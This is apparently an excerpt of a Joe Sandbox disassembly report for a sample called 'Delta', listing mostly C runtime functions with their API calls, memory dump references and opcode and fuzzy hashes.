Download Yara Rule

APIs

Part of subcall function 005F69F4: HeapAlloc.KERNEL32(00000008,00000000,00000000,?,005F5B8F,00000001,00000364,00000002,000000FF,?,00000000,?,005ED655,00000000,?), ref: 005F6A35

FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 005FB889
FindNextFileW.KERNEL32(00000000,?), ref: 005FB97D
FindClose.KERNEL32(00000000), ref: 005FB9BC
FindClose.KERNEL32(00000000), ref: 005FB9EF

Memory Dump Source

Source File: 00000000.00000002.1693409512.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.1693391821.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693437465.0000000000606000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693456077.0000000000610000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693471503.0000000000611000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693492898.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693511643.0000000000617000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_Delta.jbxd

Similarity

API ID: Find$CloseFile$AllocFirstHeapNext
String ID:
API String ID: 2701053895-0
Opcode ID: 860c20129ae9f77e1f0437f43bbe883d7119e1af4ddc0edcc85eae6d38555766
Instruction ID: b8cc0dba2fb4bb478e3a0ecf0139779bcb0b27a71293b76e9fef43a5dc28297c
Opcode Fuzzy Hash: 860c20129ae9f77e1f0437f43bbe883d7119e1af4ddc0edcc85eae6d38555766
Instruction Fuzzy Hash: 8F51337590110DEEEF24AF38CC89ABE7FA9EFC5344F144199FA1997201EB389D419B60

Function 005FAFF0 Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

Part of subcall function 005F594A: GetLastError.KERNEL32(00000000,?,005F7CCD), ref: 005F594E
Part of subcall function 005F594A: SetLastError.KERNEL32(00000000,?,?,00000028,005F1F93), ref: 005F59F0

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 005FB044

Memory Dump Source

Source File: 00000000.00000002.1693409512.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.1693391821.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693437465.0000000000606000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693456077.0000000000610000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693471503.0000000000611000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693492898.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693511643.0000000000617000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_Delta.jbxd

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: 1428d49eb3019211cdb27516ca743be14626b16e163142408e508824acec42ae
Instruction ID: 0ee037149a97d9bb008695a5818ac7fa4923b932b9b92b9b67659e2717ce488c
Opcode Fuzzy Hash: 1428d49eb3019211cdb27516ca743be14626b16e163142408e508824acec42ae
Instruction Fuzzy Hash: 7721837265120BEBEB289B25DD49ABB7BACFF44310B10407AFB11C6181EF789D41CB50

Function 005EDDE2 Relevance: 1.6, Strings: 1, Instructions: 318COMMON

Download Yara Rule

Strings

0, xrefs: 005EDF66

Memory Dump Source

Source File: 00000000.00000002.1693409512.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.1693391821.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693437465.0000000000606000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693456077.0000000000610000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693471503.0000000000611000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693492898.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693511643.0000000000617000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_Delta.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 0422a51fa2525f5600fb712295ed5d43f581595df28f560164dd6508add14ee0
Instruction ID: 7b7ce7243df9bce5084a4af690ba017fc595558bdd72d5079c85117adeff131a
Opcode Fuzzy Hash: 0422a51fa2525f5600fb712295ed5d43f581595df28f560164dd6508add14ee0
Instruction Fuzzy Hash: 15B1C37090068B8BCB3CCF6A895A6BEBFB5BF55300F140619D9E39B681D7319D42CB61

Function 005FB110 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

Part of subcall function 005F594A: GetLastError.KERNEL32(00000000,?,005F7CCD), ref: 005F594E
Part of subcall function 005F594A: SetLastError.KERNEL32(00000000,?,?,00000028,005F1F93), ref: 005F59F0

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 005FB164

Memory Dump Source

Source File: 00000000.00000002.1693409512.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.1693391821.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693437465.0000000000606000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693456077.0000000000610000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693471503.0000000000611000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693492898.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693511643.0000000000617000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_Delta.jbxd

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: b990b817b88dea725def9db649314ce0c6cb76a41a9d2ff67cefa2134029c282
Instruction ID: af0a765316d1e1cc378ecf3e19851846248849dd7d00bae86970b579a1535372
Opcode Fuzzy Hash: b990b817b88dea725def9db649314ce0c6cb76a41a9d2ff67cefa2134029c282
Instruction Fuzzy Hash: 5A11A77265020BDBE718AB28DC56DBA7BADFF45310B14416AE605D7141EB78ED01C750

Function 005FAC88 Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 005F594A: GetLastError.KERNEL32(00000000,?,005F7CCD), ref: 005F594E
Part of subcall function 005F594A: SetLastError.KERNEL32(00000000,?,?,00000028,005F1F93), ref: 005F59F0

EnumSystemLocalesW.KERNEL32(005FAD30,00000001,00000000,?,-00000050,?,005FAB13,00000000,-00000002,00000000,?,00000055,?), ref: 005FACFA

Memory Dump Source

Source File: 00000000.00000002.1693409512.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.1693391821.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693437465.0000000000606000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693456077.0000000000610000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693471503.0000000000611000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693492898.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693511643.0000000000617000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_Delta.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 0dee9fb092a1e17dfd362ab4b495cac0f0f6591fdf58bbb059cd7446f891b064
Instruction ID: ccb11cc0bbe516d24c8b58129b9843ec7cc7e487a984f67d6a9143e3fb14dc0d
Opcode Fuzzy Hash: 0dee9fb092a1e17dfd362ab4b495cac0f0f6591fdf58bbb059cd7446f891b064
Instruction Fuzzy Hash: EB11E9772007059FDB189F39C89167ABB92FF80769B19842CEA4B87B40D775BD42C741

Function 005FB2BD Relevance: 1.5, APIs: 1, Instructions: 48COMMON

Download Yara Rule

APIs

Part of subcall function 005F594A: GetLastError.KERNEL32(00000000,?,005F7CCD), ref: 005F594E
Part of subcall function 005F594A: SetLastError.KERNEL32(00000000,?,?,00000028,005F1F93), ref: 005F59F0

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,005FAF4C,00000000,00000000,?), ref: 005FB2E9

Memory Dump Source

Source File: 00000000.00000002.1693409512.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.1693391821.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693437465.0000000000606000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693456077.0000000000610000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693471503.0000000000611000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693492898.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693511643.0000000000617000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_Delta.jbxd

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: ac68868688e2aec1f3983cb74a8b0aa0285d3a33f6bde964bfa3067ea5f99750
Instruction ID: f4a1caabd42cadb225af9820ea44fae4faf80871eddef85b72cc6f4a7e52c9ce
Opcode Fuzzy Hash: ac68868688e2aec1f3983cb74a8b0aa0285d3a33f6bde964bfa3067ea5f99750
Instruction Fuzzy Hash: 1201DB36A5011AEBEF185A24CC066BA7B54FB40354F554C28EE06A31C0EB78FE41C590

Function 005FAF83 Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 005F594A: GetLastError.KERNEL32(00000000,?,005F7CCD), ref: 005F594E
Part of subcall function 005F594A: SetLastError.KERNEL32(00000000,?,?,00000028,005F1F93), ref: 005F59F0

EnumSystemLocalesW.KERNEL32(005FAFF0,00000001,?,?,-00000050,?,005FAADB,-00000050,-00000002,00000000,?,00000055,?,-00000050,?,?), ref: 005FAFCD

Memory Dump Source

Source File: 00000000.00000002.1693409512.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.1693391821.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693437465.0000000000606000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693456077.0000000000610000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693471503.0000000000611000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693492898.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693511643.0000000000617000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_Delta.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: a601a63daa5be678f47b4bdd8e17a52e763054be75b8cf1e3a68ad5c45e8a28d
Instruction ID: cd472abd56af9e6dca79df4898ba8ad18831634983a0b43df5ad19f0678f7d98
Opcode Fuzzy Hash: a601a63daa5be678f47b4bdd8e17a52e763054be75b8cf1e3a68ad5c45e8a28d
Instruction Fuzzy Hash: 03F0F6BA2003085FDB256F39DC85A7A7F91FF80368B15852CFB4A4B680D6B99C42C652

Function 005F68FD Relevance: 1.5, APIs: 1, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 005F1D11: EnterCriticalSection.KERNEL32(?,?,005F5DD8,?,0060FC38,00000008,005F5CCA,00000000,00000000,?), ref: 005F1D20

EnumSystemLocalesW.KERNEL32(005F68F0,00000001,0060FCB8,0000000C,005F62F1,-00000050), ref: 005F6935

Memory Dump Source

Source File: 00000000.00000002.1693409512.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.1693391821.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693437465.0000000000606000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693456077.0000000000610000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693471503.0000000000611000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693492898.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693511643.0000000000617000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_Delta.jbxd

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: 72d1a3e20dbb095a45ce38779ca038f0a90ba219c32a5a306cdc38d4a6be8f6b
Instruction ID: 92c49f0ab6e878ac4ff5a0b34ba4adad9118df1d99996185adb6fe5f9f2fdca0
Opcode Fuzzy Hash: 72d1a3e20dbb095a45ce38779ca038f0a90ba219c32a5a306cdc38d4a6be8f6b
Instruction Fuzzy Hash: BCF08C36A00205DFD704DFA8E846B9D7BF1FB48720F00802AF5109B2E0C7794800CF40

Function 005FB0C5 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 005F594A: GetLastError.KERNEL32(00000000,?,005F7CCD), ref: 005F594E
Part of subcall function 005F594A: SetLastError.KERNEL32(00000000,?,?,00000028,005F1F93), ref: 005F59F0

EnumSystemLocalesW.KERNEL32(005FB110,00000001,?,?,?,005FAB35,-00000050,-00000002,00000000,?,00000055,?,-00000050,?,?,?), ref: 005FB0FC

Memory Dump Source

Source File: 00000000.00000002.1693409512.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.1693391821.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693437465.0000000000606000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693456077.0000000000610000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693471503.0000000000611000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693492898.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693511643.0000000000617000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_Delta.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 54f8475272b14ba5d49a258cdca92a21b338fedf272ab145d74edc5a5926d66c
Instruction ID: deef51674325b33ae2315046f998c0a33ea1b3f61ee763924c5d58ea059b4eb6
Opcode Fuzzy Hash: 54f8475272b14ba5d49a258cdca92a21b338fedf272ab145d74edc5a5926d66c
Instruction Fuzzy Hash: B7F0E53A30020D97DB049F35DC59A7B7F99FFC1760F0A8058EB0A8B690CB799842C790

Function 005F63F5 Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,00000000,?,005F0A63,?,20001004,00000000,00000002,?,?,005EF971), ref: 005F6429

Memory Dump Source

Source File: 00000000.00000002.1693409512.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.1693391821.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693437465.0000000000606000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693456077.0000000000610000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693471503.0000000000611000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693492898.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693511643.0000000000617000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_Delta.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 06fd1edb0206d00b0c663f4e7df67778c371d7877e3c39f76e87596892f1a93e
Instruction ID: c78c2eed210d9ccbd948df1afefe0743f84417579d83e063cc9deda8ef12a783
Opcode Fuzzy Hash: 06fd1edb0206d00b0c663f4e7df67778c371d7877e3c39f76e87596892f1a93e
Instruction Fuzzy Hash: 7DE04F3154012DBBCF123F60DC09EBE7E16FF44750F048421FE0566161CB368921AAD1

Function 005E9A67 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_00009B90), ref: 005E9A6C

Memory Dump Source

Source File: 00000000.00000002.1693409512.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.1693391821.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693437465.0000000000606000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693456077.0000000000610000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693471503.0000000000611000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693492898.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693511643.0000000000617000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_Delta.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: c064002bbe53c44a255696192ae6d49a022a6869e840264b7256a40b82f61d4c
Instruction ID: 93c5a9d4995e75f63904cf586dc4c4a19a21a4c9d301eb21a701f4ea79951820
Opcode Fuzzy Hash: c064002bbe53c44a255696192ae6d49a022a6869e840264b7256a40b82f61d4c
Instruction Fuzzy Hash:

Function 005F7020 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 005F7020

Memory Dump Source

Source File: 00000000.00000002.1693409512.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.1693391821.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693437465.0000000000606000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693456077.0000000000610000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693471503.0000000000611000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693492898.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693511643.0000000000617000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_Delta.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 62d1fd4ffd7bc7a8a7d4b71f51782ec71dc49d757a6955cfaee8cb7b6744440b
Instruction ID: 3b5b7f5cb26eb5df0b87d0afe0a42591287a0a8387615aebacb68df5d215057b
Opcode Fuzzy Hash: 62d1fd4ffd7bc7a8a7d4b71f51782ec71dc49d757a6955cfaee8cb7b6744440b
Instruction Fuzzy Hash: 9DA012302401128F93004F315904B0937D69502180308D4559010C4020D73040409F00

Function 005E1BA0 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1693409512.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.1693391821.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693437465.0000000000606000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693456077.0000000000610000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693471503.0000000000611000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693492898.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693511643.0000000000617000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_Delta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8278a685f3299ffc7fc03f55dd0c73398b8acbcba07770dc7837db0f3b5f4c8a
Instruction ID: 2fcac6b486f30b2757756bf5f22dc632ee4fd66aba0ab1726ed9b63c01200b4a
Opcode Fuzzy Hash: 8278a685f3299ffc7fc03f55dd0c73398b8acbcba07770dc7837db0f3b5f4c8a
Instruction Fuzzy Hash: AED06C3A641A58AFC210CF49E440D41F7A9FB8AA70B158166EA4897B20C331F811CAE0

Function 006041D2 Relevance: 12.2, APIs: 8, Instructions: 248COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCPInfo.KERNEL32(02DD05A8,02DD05A8,00000000,7FFFFFFF,?,006041BD,02DD05A8,02DD05A8,00000000,02DD05A8,?,?,?,?,02DD05A8,00000000), ref: 00604278
__alloca_probe_16.LIBCMT ref: 00604333
__alloca_probe_16.LIBCMT ref: 006043C2
__freea.LIBCMT ref: 0060440D
__freea.LIBCMT ref: 00604413
__freea.LIBCMT ref: 00604449
__freea.LIBCMT ref: 0060444F
__freea.LIBCMT ref: 0060445F

Memory Dump Source

Source File: 00000000.00000002.1693409512.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.1693391821.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693437465.0000000000606000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693456077.0000000000610000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693471503.0000000000611000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693492898.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693511643.0000000000617000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_Delta.jbxd

Similarity

API ID: __freea$__alloca_probe_16$Info
String ID:
API String ID: 127012223-0
Opcode ID: 85535a1808d68c79740530c61c64b0f7d6fe7f6abf94eea5e07dc48d9acff5c1
Instruction ID: 3c0a0d4cd4a117d043fc193601349a01ae03438224e71b6175ebbc53d39b86df
Opcode Fuzzy Hash: 85535a1808d68c79740530c61c64b0f7d6fe7f6abf94eea5e07dc48d9acff5c1
Instruction Fuzzy Hash: 9D71D2B2A8024A9BDF399E948C45BEF7BEBEF85350F280055FB14A72C1DE359D008790

Function 005F85B6 Relevance: 10.8, APIs: 7, Instructions: 329COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 005F863C

Memory Dump Source

Source File: 00000000.00000002.1693409512.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.1693391821.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693437465.0000000000606000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693456077.0000000000610000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693471503.0000000000611000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693492898.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693511643.0000000000617000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_Delta.jbxd

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: b258c23f8f5adf4b5b829db56bad2fb8a7efe0f2db3ca2ba46b92337591bc9f9
Instruction ID: 6ce85c00b0e5e7211ca12d140c31bbb912b556b6b4e4b78a57cd94fe5b901a64
Opcode Fuzzy Hash: b258c23f8f5adf4b5b829db56bad2fb8a7efe0f2db3ca2ba46b92337591bc9f9
Instruction Fuzzy Hash: 63B16932A0125AAFDB159F28CC81BBE7FA5FF55350F244555EA04AF382DB78D901C7A0

Function 005F4D4C Relevance: 10.8, APIs: 2, Strings: 4, Instructions: 301COMMONLIBRARYCODE

Download Yara Rule

APIs

type_info::operator==.LIBVCRUNTIME ref: 005F4E6B
CallUnexpected.LIBVCRUNTIME ref: 005F50E4

Strings

csm, xrefs: 005F4D89
csm, xrefs: 005F4EA2
xf`, xrefs: 005F4E62
csm, xrefs: 005F4DF6

Memory Dump Source

Source File: 00000000.00000002.1693409512.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.1693391821.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693437465.0000000000606000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693456077.0000000000610000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693471503.0000000000611000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693492898.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693511643.0000000000617000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_Delta.jbxd

Similarity

API ID: CallUnexpectedtype_info::operator==
String ID: csm$csm$csm$xf`
API String ID: 2673424686-4120364529
Opcode ID: bb5edc972cccdeef55e48156311ede0c7cbabdee48f51825fb9e4661e3853f2f
Instruction ID: 0e0e6404609a50d4a88b7c85dda986c2ede798d1eb20a1915abee1e309db62b5
Opcode Fuzzy Hash: bb5edc972cccdeef55e48156311ede0c7cbabdee48f51825fb9e4661e3853f2f
Instruction Fuzzy Hash: 8CB1693180020E9FCF15DFA4C8499BFBBB9BF44310B10455AEB146B252EB79DA51CF92

Function 005EABB0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 132COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 005EABE7
___except_validate_context_record.LIBVCRUNTIME ref: 005EABEF
_ValidateLocalCookies.LIBCMT ref: 005EAC78
__IsNonwritableInCurrentImage.LIBCMT ref: 005EACA3
_ValidateLocalCookies.LIBCMT ref: 005EACF8

Strings

csm, xrefs: 005EAC8D

Memory Dump Source

Source File: 00000000.00000002.1693409512.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.1693391821.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693437465.0000000000606000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693456077.0000000000610000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693471503.0000000000611000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693492898.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693511643.0000000000617000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_Delta.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 004fccb77f85478e03586593aedc812551a7b4c1426eb2bf536c44ce87e366ce
Instruction ID: 6da32586bb7195d0469da79f2a3343ac19003b1568796e3c419885df7191c2e8
Opcode Fuzzy Hash: 004fccb77f85478e03586593aedc812551a7b4c1426eb2bf536c44ce87e366ce
Instruction Fuzzy Hash: 97410330A0025A9BCF15DF39C885AAE7FA2BF41324F248155F9589B392D735BE41CB92

Function 00602E9C Relevance: 9.3, APIs: 6, Instructions: 292COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1693409512.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.1693391821.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693437465.0000000000606000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693456077.0000000000610000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693471503.0000000000611000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693492898.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
